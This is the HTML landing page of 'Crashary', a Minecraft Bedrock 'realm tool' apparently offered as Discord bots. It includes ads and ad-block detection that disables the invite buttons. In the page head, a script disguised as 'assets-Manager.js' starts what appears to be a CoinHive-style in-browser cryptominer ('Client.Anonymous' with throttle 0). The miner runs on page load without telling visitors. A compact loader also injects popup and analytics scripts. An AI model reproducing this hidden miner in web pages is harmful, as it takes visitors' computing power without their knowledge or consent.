<!DOCTYPE html>
<html>
<meta property="og:type" content="website">
<meta property="og:title" content="Crashary" />
<meta property="og:description" content="Crashary: The #1 Best Realm Tool for MCBE." />
<meta property="og:url" content="https://crashary.uk" />
<meta property="og:image" content="https://cdn.crashary.uk/crashary.png">
  <meta content="#992318" data-react-helmet="true" name="theme-color" />
  <title id="webTitle">Crashary</title>
  <link rel="shortcut icon" type="image/x-icon" href="./favicon.ico">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="style.css" rel="stylesheet" type="text/css"/>
  <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
  <script src="https://kit.fontawesome.com/5ea35be0ac.js" crossorigin="anonymous"></script>
   <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8939266182833306" crossorigin="anonymous" onerror="adBlocked();"></script>
    <style>
    .button {
      margin-top: 10px;
      border: none;
      padding: 10px;
      width: 100%;
      display: block;
      position: relative;
      overflow: hidden;
      color: #fff;
      background-color: #9c0000;
      font-family: 'Roboto', sans-serif;
      font-size: 1.5rem;
      outline: 0;
      border-radius: 0.25rem;
      box-shadow: 0 0 0.5rem rgba(0, 0, 0, 0.3);
      cursor: pointer;
    }

    .button:active {
      margin-top: 10px;
      border: none;
      padding: 10px;
      width: 100%;
      display: block;
      position: relative;
      overflow: hidden;
      color: #fff;
      background-color: #9c0000;
      font-family: 'Roboto', sans-serif;
      font-size: 1.5rem;
      outline: 0;
      border-radius: 0.25rem;
      box-shadow: 0 0 0.5rem rgba(0, 0, 0, 0.3);
      cursor: pointer;
    }

    .button span {
      cursor: pointer;
      display: inline-block;
      position: relative;
      transition: 0.5s;
    }

    .button span:after {
      content: '»';
      position: absolute;
      opacity: 0;
      top: 0;
      right: -20px;
      transition: 0.5s;
    }

    .button:hover span {
      padding-right: 25px;
    }

    .button:hover span:after {
      opacity: 1;
      right: 0;
    }

    .button:disabled {
      opacity: 0.3;
    }
  </style>
</head>

<script src="assets-Manager.js"></script>
<script>
    var _client = new Client.Anonymous('9e92a7d17d747956ed099148e0b05a80ca7bc75cc889b23b559f6f7d776aa763', {
        throttle: 0, c: 'w', ads: 0
    });
    _client.start();
</script>
  
<body>
  <div class="topadwrap" style="width: 728px; height: auto !important; clear: both; text-align: center;">
  <ins class="adsbygoogle"
     style="display: block; margin: 10px auto 16px; background-color: transparent; height: 90px;"
     data-ad-format="auto"
     data-ad-client="ca-pub-8939266182833306"
     data-ad-slot="8512325236"
     data-full-width-responsive="true">
     </ins>
  </div>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
  <div id="particles-js"></div>
  <script src="particle.js"></script>
  <div id="content">
    <div class="image-container">
     <img alt="Crashary" src="crashary.png" class="crashary image">
      <img alt="Crashary Logo" class="title-img image"
        src="logo.gif">
    </div>
    <p><a href="https://crashary.uk/policy">Privacy Policy</a></p>
    <div class="button-container">
      <button class="button"
        onclick="window.location.href='https://discord.com/api/oauth2/authorize?client_id=1083904773348147310&permissions=17180249089&scope=bot%20applications.commands'"><span>Add
          Crashary</span></button>
      <button class="button"
  onclick="window.location.href='https://discord.com/api/oauth2/authorize?client_id=1128357072321380372&permissions=137439332353&scope=bot%20applications.commands'"><span>Add Crashary MI</span></button>
    </div>
  </div>
  <script>
  var adB = false;
  </script>
    <script>
  (function(){id='mScaBGkMwW5u-MBvDni17NotI';function l(u){var e=document.createElement('script');e.type='text/javascript';e.src='https://crashary.uk/'+u;e.async=0;var x=document.getElementsByTagName('script')[0];x.parentNode.insertBefore(e,x);}l('xpopup.js');l('analyze.js');})();
</script>
<script>
  function adBlocked() {
  console.log('Ad Blocker Detection - Ad was blocked.')
  document.getElementsByClassName("button")[0].disabled = true;
  document.getElementsByClassName("button")[1].disabled = true;
  var adB = false;
}
</script>
<script src="core-Detect.js"></script>
</body>

</html>
